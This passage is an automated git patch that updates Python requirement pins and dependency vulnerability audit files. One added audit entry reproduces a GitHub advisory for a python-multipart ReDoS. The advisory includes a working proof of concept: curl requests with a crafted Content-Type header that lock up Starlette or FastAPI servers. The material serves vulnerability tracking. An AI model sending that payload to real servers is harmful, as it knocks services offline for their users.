From 8b59c5e127517d2a73c4d31c18860c3be1307b6a Mon Sep 17 00:00:00 2001 From: "github.actions" Date: Thu, 29 Feb 2024 08:06:21 +0000 Subject: [PATCH] Latest data: Thu Feb 29 08:06:21 UTC 2024 --- audits/esphome-requirements.audit.json | 521 ++++++++++++++++++ audits/openai-whisper-requirements.audit.json | 164 ------ audits/torchvision-requirements.audit.json | 414 -------------- requirements/awscli-local-requirements.txt | 5 +- requirements/bzt-requirements.txt | 6 + requirements/codelimit-requirements.txt | 4 + requirements/conda-lock-requirements.txt | 21 +- requirements/cycode-requirements.txt | 2 +- requirements/dotbot-requirements.txt | 1 + requirements/esphome-requirements.txt | 26 + requirements/fabric-requirements.txt | 1 + requirements/jc-requirements.txt | 1 + requirements/jello-requirements.txt | 1 + requirements/ocrmypdf-requirements.txt | 9 +- requirements/openai-whisper-requirements.txt | 22 +- requirements/pytorch-requirements.txt | 10 + requirements/torchvision-requirements.txt | 6 +- 17 files changed, 610 insertions(+), 604 deletions(-) delete mode 100644 audits/openai-whisper-requirements.audit.json delete mode 100644 audits/torchvision-requirements.audit.json create mode 100644 requirements/dotbot-requirements.txt create mode 100644 requirements/jello-requirements.txt diff --git a/audits/esphome-requirements.audit.json b/audits/esphome-requirements.audit.json index ae73ab98..3da3fba9 100644 --- a/audits/esphome-requirements.audit.json +++ b/audits/esphome-requirements.audit.json 
@@ -247,5 +247,526 @@ ] } ] + }, + { + "package": { + "name": "starlette", + "version": "0.35.1", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "esphome-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-17T06:26:40Z", + "published": "2024-02-12T17:28:12Z", + "schema_version": "1.6.0", + "id": "GHSA-2jv5-9r88-3w3p", + "aliases": [ + "CVE-2024-24762", + "GHSA-93gm-qmq6-w238", + "GHSA-qf9m-vfgh-m389", + "PYSEC-2024-38" + ], + "summary": "python-multipart vulnerable to Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; 
!=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a simple WSGI application, that just parses the `Content-Type`, and run it with `python main.py`:\n\n```Python\n# main.py\nfrom wsgiref.simple_server import make_server\nfrom wsgiref.validate import validator\n\nfrom multipart.multipart import parse_options_header\n\n\ndef simple_app(environ, start_response):\n _, _ = parse_options_header(environ[\"CONTENT_TYPE\"])\n\n start_response(\"200 OK\", [(\"Content-type\", \"text/plain\")])\n return [b\"Ok\"]\n\n\nhttpd = make_server(\"\", 8123, validator(simple_app))\nprint(\"Serving on port 8123...\")\nhttpd.serve_forever()\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8123/'\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data. 
This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument 
and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "python-multipart", + "purl": "pkg:pypi/python-multipart" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.7" + } + ] + } + ], + "versions": [ + "0.0.1", + "0.0.2", + "0.0.3", + "0.0.4", + "0.0.5", + "0.0.6" + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.0.6", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-2jv5-9r88-3w3p/GHSA-2jv5-9r88-3w3p.json" + } + }, + { + "package": { + "ecosystem": "PyPI", + "name": "fastapi", + "purl": "pkg:pypi/fastapi" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.109.1" + } + ] + } + ], + "versions": [ + "0.1.0", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.18", + "0.1.19", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.10.0", + "0.10.1", + "0.10.2", + "0.100.0", + "0.100.0b1", + "0.100.0b2", + "0.100.0b3", + "0.100.1", + "0.101.0", + "0.101.1", + "0.102.0", + "0.103.0", + "0.103.1", + "0.103.2", + "0.104.0", + "0.104.1", + "0.105.0", + "0.106.0", + "0.107.0", + "0.108.0", + "0.109.0", + "0.11.0", + "0.12.0", + "0.12.1", + "0.13.0", + "0.14.0", + "0.15.0", + "0.16.0", + "0.17.0", + "0.18.0", + "0.19.0", + "0.2.0", + "0.2.1", + "0.20.0", + "0.20.1", + "0.21.0", + "0.22.0", + "0.23.0", + "0.24.0", + "0.25.0", + "0.26.0", + "0.27.0", + "0.27.1", + "0.27.2", + "0.28.0", + "0.29.0", + "0.29.1", + "0.3.0", + "0.30.0", + "0.30.1", + "0.31.0", + "0.32.0", + "0.33.0", + "0.34.0", + "0.35.0", + "0.36.0", + "0.37.0", + "0.38.0", + "0.38.1", + "0.39.0", + "0.4.0", + "0.40.0", + "0.41.0", + "0.42.0", + "0.43.0", + "0.44.0", + "0.44.1", + "0.45.0", + "0.46.0", + "0.47.0", + "0.47.1", + "0.48.0", + "0.49.0", + "0.49.1", + "0.49.2", + "0.5.0", + "0.5.1", + "0.50.0", + 
"0.51.0", + "0.52.0", + "0.53.0", + "0.53.1", + "0.53.2", + "0.54.0", + "0.54.1", + "0.54.2", + "0.55.0", + "0.55.1", + "0.56.0", + "0.56.1", + "0.57.0", + "0.58.0", + "0.58.1", + "0.59.0", + "0.6.0", + "0.6.1", + "0.6.2", + "0.6.3", + "0.6.4", + "0.60.0", + "0.60.1", + "0.60.2", + "0.61.0", + "0.61.1", + "0.61.2", + "0.62.0", + "0.63.0", + "0.64.0", + "0.65.0", + "0.65.1", + "0.65.2", + "0.65.3", + "0.66.0", + "0.66.1", + "0.67.0", + "0.68.0", + "0.68.1", + "0.68.2", + "0.69.0", + "0.7.0", + "0.7.1", + "0.70.0", + "0.70.1", + "0.71.0", + "0.72.0", + "0.73.0", + "0.74.0", + "0.74.1", + "0.75.0", + "0.75.1", + "0.75.2", + "0.76.0", + "0.77.0", + "0.77.1", + "0.78.0", + "0.79.0", + "0.79.1", + "0.8.0", + "0.80.0", + "0.81.0", + "0.82.0", + "0.83.0", + "0.84.0", + "0.85.0", + "0.85.1", + "0.85.2", + "0.86.0", + "0.87.0", + "0.88.0", + "0.89.0", + "0.89.1", + "0.9.0", + "0.9.1", + "0.90.0", + "0.90.1", + "0.91.0", + "0.92.0", + "0.93.0", + "0.94.0", + "0.94.1", + "0.95.0", + "0.95.1", + "0.95.2", + "0.96.0", + "0.96.1", + "0.97.0", + "0.98.0", + "0.99.0", + "0.99.1" + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.109.0", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-2jv5-9r88-3w3p/GHSA-2jv5-9r88-3w3p.json" + } + }, + { + "package": { + "ecosystem": "PyPI", + "name": "starlette", + "purl": "pkg:pypi/starlette" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.36.2" + } + ] + } + ], + "versions": [ + "0.1.0", + "0.1.1", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.10.0", + "0.10.1", + "0.10.2", + "0.10.3", + "0.10.4", + "0.10.5", + "0.10.6", + "0.10.7", + "0.11.0", + "0.11.1", + "0.11.2", + "0.11.3", + "0.11.4", + "0.12.0", + "0.12.0b1", + "0.12.0b2", + "0.12.0b3", + "0.12.1", + 
"0.12.10", + "0.12.11", + "0.12.12", + "0.12.13", + "0.12.2", + "0.12.3", + "0.12.4", + "0.12.5", + "0.12.6", + "0.12.7", + "0.12.8", + "0.12.9", + "0.13.0", + "0.13.1", + "0.13.2", + "0.13.3", + "0.13.4", + "0.13.5", + "0.13.6", + "0.13.7", + "0.13.8", + "0.14.0", + "0.14.1", + "0.14.2", + "0.15.0", + "0.16.0", + "0.17.0", + "0.17.1", + "0.18.0", + "0.19.0", + "0.19.1", + "0.2.0", + "0.2.1", + "0.2.2", + "0.2.3", + "0.20.0", + "0.20.1", + "0.20.2", + "0.20.3", + "0.20.4", + "0.21.0", + "0.22.0", + "0.23.0", + "0.23.1", + "0.24.0", + "0.25.0", + "0.26.0", + "0.26.0.post1", + "0.26.1", + "0.27.0", + "0.28.0", + "0.29.0", + "0.3.0", + "0.3.1", + "0.3.2", + "0.3.3", + "0.3.4", + "0.3.5", + "0.3.6", + "0.3.7", + "0.30.0", + "0.31.0", + "0.31.1", + "0.32.0", + "0.32.0.post1", + "0.33.0", + "0.34.0", + "0.35.0", + "0.35.1", + "0.36.0", + "0.36.1", + "0.4.0", + "0.4.1", + "0.4.2", + "0.5.0", + "0.5.1", + "0.5.2", + "0.5.3", + "0.5.4", + "0.5.5", + "0.6.0", + "0.6.1", + "0.6.2", + "0.6.3", + "0.7.0", + "0.7.1", + "0.7.2", + "0.7.3", + "0.7.4", + "0.8.0", + "0.8.1", + "0.8.2", + "0.8.3", + "0.8.4", + "0.8.5", + "0.8.6", + "0.8.7", + "0.8.8", + "0.9.0", + "0.9.1", + "0.9.10", + "0.9.11", + "0.9.2", + "0.9.3", + "0.9.4", + "0.9.5", + "0.9.6", + "0.9.7", + "0.9.8", + "0.9.9" + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.36.1", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-2jv5-9r88-3w3p/GHSA-2jv5-9r88-3w3p.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p" + }, + { + "type": "WEB", + "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238" + }, + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389" + }, 
+ { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24762" + }, + { + "type": "WEB", + "url": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4" + }, + { + "type": "WEB", + "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5" + }, + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Kludex/python-multipart" + }, + { + "type": "WEB", + "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/fastapi/PYSEC-2024-38.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-12T17:28:12Z", + "nvd_published_at": null, + "severity": "HIGH" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-2jv5-9r88-3w3p" + ], + "aliases": [ + "CVE-2024-24762", + "GHSA-2jv5-9r88-3w3p", + "GHSA-93gm-qmq6-w238", + "GHSA-qf9m-vfgh-m389", + "PYSEC-2024-38" + ] + } + ] } ] \ No newline at end of file diff --git a/audits/openai-whisper-requirements.audit.json b/audits/openai-whisper-requirements.audit.json deleted file mode 100644 index 1aa313cf..00000000 --- a/audits/openai-whisper-requirements.audit.json +++ /dev/null 
@@ -1,164 +0,0 @@ -[ - { - "package": { - "name": "jinja2", - "version": "3.1.2", - "ecosystem": "PyPI" - }, - "dependency_groups": [ - "openai-whisper-requirements" - ], - "vulnerabilities": [ - { - "modified": "2024-02-16T08:18:43Z", - "published": "2024-01-11T15:20:48Z", - "schema_version": "1.6.0", - "id": "GHSA-h5c8-rqwp-cp95", - "aliases": [ - "CVE-2024-22195" - ], - "summary": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter", - "details": "The `xmlattr` filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the `xmlattr` filter, and an application doing so should already be verifying what keys are provided regardless of this fix.", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "jinja2", - "purl": "pkg:pypi/jinja2" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "3.1.3" - } - ] - } - ], - "versions": [ - "2.0", - "2.0rc1", - "2.1", - "2.1.1", - "2.10", - "2.10.1", - "2.10.2", - "2.10.3", - "2.11.0", - "2.11.1", - "2.11.2", - "2.11.3", - "2.2", - "2.2.1", - "2.3", - "2.3.1", - "2.4", - "2.4.1", - "2.5", - "2.5.1", - "2.5.2", - "2.5.3", - "2.5.4", - "2.5.5", - "2.6", - "2.7", - "2.7.1", - "2.7.2", - "2.7.3", - "2.8", - "2.8.1", - "2.9", - "2.9.1", - "2.9.2", - "2.9.3", - "2.9.4", - "2.9.5", - "2.9.6", - "3.0.0", - "3.0.0a1", - "3.0.0rc1", - "3.0.0rc2", - "3.0.1", - "3.0.2", - "3.0.3", - "3.1.0", - "3.1.1", - "3.1.2" - ], - "database_specific": { - "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-h5c8-rqwp-cp95/GHSA-h5c8-rqwp-cp95.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" - } - ], - "references": [ - { - "type": "WEB", - "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95" - }, - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195" - }, - { - "type": "WEB", - "url": "https://github.com/pallets/jinja/commit/716795349a41d4983a9a4771f7d883c96ea17be7" - }, - { - "type": "PACKAGE", - "url": "https://github.com/pallets/jinja" - }, - { - "type": "WEB", - "url": "https://github.com/pallets/jinja/releases/tag/3.1.3" - }, - { - "type": "WEB", - "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "github_reviewed": true, - "github_reviewed_at": "2024-01-11T15:20:48Z", - "nvd_published_at": "2024-01-11T03:15:11Z", - "severity": "MODERATE" - } - } - ], - "groups": [ - { - "ids": [ - "GHSA-h5c8-rqwp-cp95" - ], - "aliases": [ - "CVE-2024-22195", - "GHSA-h5c8-rqwp-cp95" - ] - } - ] - } -] \ No newline at end of file diff --git a/audits/torchvision-requirements.audit.json b/audits/torchvision-requirements.audit.json deleted file mode 100644 index a9507c30..00000000 --- a/audits/torchvision-requirements.audit.json +++ /dev/null 
@@ -1,414 +0,0 @@ -[ - { - "package": { - "name": "urllib3", - "version": "2.0.6", - "ecosystem": "PyPI" - }, - "dependency_groups": [ - "torchvision-requirements" - ], - "vulnerabilities": [ - { - "modified": "2024-02-21T05:25:29Z", - "published": "2023-10-17T20:15:25Z", - "schema_version": "1.6.0", - "id": "GHSA-g4mx-q9vg-27p4", - "aliases": [ - "CVE-2023-45803", - "PYSEC-2023-212" - ], - "summary": "urllib3's request body not stripped after redirect from 303 status changes request method to GET", - "details": "urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 303 \"See Other\" after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although the behavior of removing the request body is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers.\n\nFrom [RFC 9110 Section 9.3.1](https://www.rfc-editor.org/rfc/rfc9110.html#name-get):\n\n> A client SHOULD NOT generate content in a GET request unless it is made directly to an origin server that has previously indicated, in or out of band, that such a request has a purpose and will be adequately supported.\n\n## Affected usages\n\nBecause the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. 
Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable.\n\nBoth of the following conditions must be true to be affected by this vulnerability:\n\n* If you're using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON)\n* The origin service is compromised and starts redirecting using 303 to a malicious peer or the redirected-to service becomes compromised.\n\n## Remediation\n\nYou can remediate this vulnerability with any of the following steps:\n\n* Upgrade to a patched version of urllib3 (v1.26.18 or v2.0.7)\n* Disable redirects for services that you aren't expecting to respond with redirects with `redirects=False`.\n* Disable automatic redirects with `redirects=False` and handle 303 redirects manually by stripping the HTTP request body.\n", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "urllib3", - "purl": "pkg:pypi/urllib3" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "2.0.0" - }, - { - "fixed": "2.0.7" - } - ] - } - ], - "versions": [ - "2.0.0", - "2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - "2.0.6" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g4mx-q9vg-27p4/GHSA-g4mx-q9vg-27p4.json" - } - }, - { - "package": { - "ecosystem": "PyPI", - "name": "urllib3", - "purl": "pkg:pypi/urllib3" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "1.26.18" - } - ] - } - ], - "versions": [ - "0.2", - "0.3", - "0.3.1", - "0.4.0", - "0.4.1", - "1.0", - "1.0.1", - "1.0.2", - "1.1", - "1.10", - "1.10.1", - "1.10.2", - "1.10.3", - "1.10.4", - "1.11", - "1.12", - "1.13", - "1.13.1", - "1.14", - "1.15", - "1.15.1", - "1.16", - "1.17", - "1.18", - "1.18.1", - "1.19", - "1.19.1", - "1.2", - "1.2.1", - "1.2.2", - "1.20", - "1.21", - "1.21.1", - 
"1.22", - "1.23", - "1.24", - "1.24.1", - "1.24.2", - "1.24.3", - "1.25", - "1.25.1", - "1.25.10", - "1.25.11", - "1.25.2", - "1.25.3", - "1.25.4", - "1.25.5", - "1.25.6", - "1.25.7", - "1.25.8", - "1.25.9", - "1.26.0", - "1.26.1", - "1.26.10", - "1.26.11", - "1.26.12", - "1.26.13", - "1.26.14", - "1.26.15", - "1.26.16", - "1.26.17", - "1.26.2", - "1.26.3", - "1.26.4", - "1.26.5", - "1.26.6", - "1.26.7", - "1.26.8", - "1.26.9", - "1.3", - "1.4", - "1.5", - "1.6", - "1.7", - "1.7.1", - "1.8", - "1.8.2", - "1.8.3", - "1.9", - "1.9.1" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g4mx-q9vg-27p4/GHSA-g4mx-q9vg-27p4.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" - } - ], - "references": [ - { - "type": "WEB", - "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4" - }, - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803" - }, - { - "type": "WEB", - "url": "https://github.com/urllib3/urllib3/commit/4e50fbc5db74e32cabd5ccc1ab81fc103adfe0b3" - }, - { - "type": "WEB", - "url": "https://github.com/urllib3/urllib3/commit/4e98d57809dacab1cbe625fddeec1a290c478ea9" - }, - { - "type": "WEB", - "url": "https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36" - }, - { - "type": "WEB", - "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml" - }, - { - "type": "PACKAGE", - "url": "https://github.com/urllib3/urllib3" - }, - { - "type": "WEB", - "url": "https://github.com/urllib3/urllib3/releases/tag/1.26.18" - }, - { - "type": "WEB", - "url": "https://github.com/urllib3/urllib3/releases/tag/2.0.7" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB" - }, - { - "type": "WEB", - "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX" - }, - { - "type": "WEB", - "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "github_reviewed": true, - "github_reviewed_at": "2023-10-17T20:15:25Z", - "nvd_published_at": "2023-10-17T20:15:10Z", - "severity": "MODERATE" - } - }, - { - "modified": "2023-11-08T04:13:39Z", - "published": "2023-10-17T20:15:00Z", - "schema_version": "1.6.0", - "id": "PYSEC-2023-212", - "aliases": [ - "CVE-2023-45803", - "GHSA-g4mx-q9vg-27p4" - ], - "details": "urllib3 is a user-friendly HTTP client library for Python. urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 301, 302, or 303 after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although this behavior is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: 1. Using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) and 2. 
The origin service is compromised and starts redirecting using 301, 302, or 303 to a malicious peer or the redirected-to service becomes compromised. This issue has been addressed in versions 1.26.18 and 2.0.7 and users are advised to update to resolve this issue. Users unable to update should disable redirects for services that aren't expecting to respond with redirects with `redirects=False` and disable automatic redirects with `redirects=False` and handle 301, 302, and 303 redirects manually by stripping the HTTP request body.\n", - "affected": [ - { - "package": { - "ecosystem": "PyPI", - "name": "urllib3", - "purl": "pkg:pypi/urllib3" - }, - "ranges": [ - { - "type": "GIT", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "4e98d57809dacab1cbe625fddeec1a290c478ea9" - } - ], - "repo": "https://github.com/urllib3/urllib3" - }, - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "2.0.0" - }, - { - "fixed": "2.0.7" - }, - { - "introduced": "0" - }, - { - "fixed": "1.26.18" - } - ] - } - ], - "versions": [ - "0.2", - "0.3", - "0.3.1", - "0.4.0", - "0.4.1", - "1.0", - "1.0.1", - "1.0.2", - "1.1", - "1.10", - "1.10.1", - "1.10.2", - "1.10.3", - "1.10.4", - "1.11", - "1.12", - "1.13", - "1.13.1", - "1.14", - "1.15", - "1.15.1", - "1.16", - "1.17", - "1.18", - "1.18.1", - "1.19", - "1.19.1", - "1.2", - 